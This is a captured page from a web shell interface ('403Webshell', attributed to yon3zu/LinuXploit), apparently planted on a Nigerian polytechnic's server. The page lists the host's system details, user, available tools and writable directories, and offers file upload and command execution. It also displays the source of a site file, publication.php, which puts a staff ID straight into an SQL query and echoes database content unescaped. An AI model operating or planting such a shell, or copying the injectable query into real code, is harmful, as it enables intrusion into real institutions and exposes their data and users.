403Webshell
Server IP : 172.64.80.1  /  Your IP : 172.69.7.193
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/profile/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/profile/publication.php
<?php
		include_once('../FpE_cess/profiler.php'); // fetch profile from db
		
		$pub = "SELECT Interest, Journals, Textbooks, Conference FROM staff_publications where StaffNo = '$staffid'";
		$pubdb = mysqli_query( $fpecon, $pub) or die(mysqli_errno());
		while ($row = mysqli_fetch_array($pubdb))
		{ 
			$interest = stripslashes($row['Interest']);
			$journals = stripslashes($row['Journals']);
			$textbooks = stripslashes($row['Textbooks']);
			$conference = stripslashes($row['Conference']);
		}
			
		/****** START PROCESSING PUBLICATIONS REQUEST ****/
		//Give users what they want to see
		echo "
		<div class='ptitle'>Research Publications of $stafftitle $staffsur $initials $initial</div>
		<div id='clr'></div>
		<div id='pfss'>Research Interest:</div>
			<div id='pftt'><ul class='educc'>$interest</ul></div>
		<div id='clr10'></div>		
		<div id='pfss'>Journal Publications</div>
			<div id='pftt'><ul class='educc'>$journals</ul></div>
		<div id='clr10'></div>
		<div id='pfss'>Textbook Publications</div>
			<div id='pftt'><ul class='educc'>$textbooks</ul></div>
		<div id='clr10'></div>
		<div id='pfss'>Conference / Seminars</div>
			<div id='pftt'><ul class='educc'>$conference</ul></div>
		";
?>

Youez - 2016 - github.com/yon3zu
LinuXploit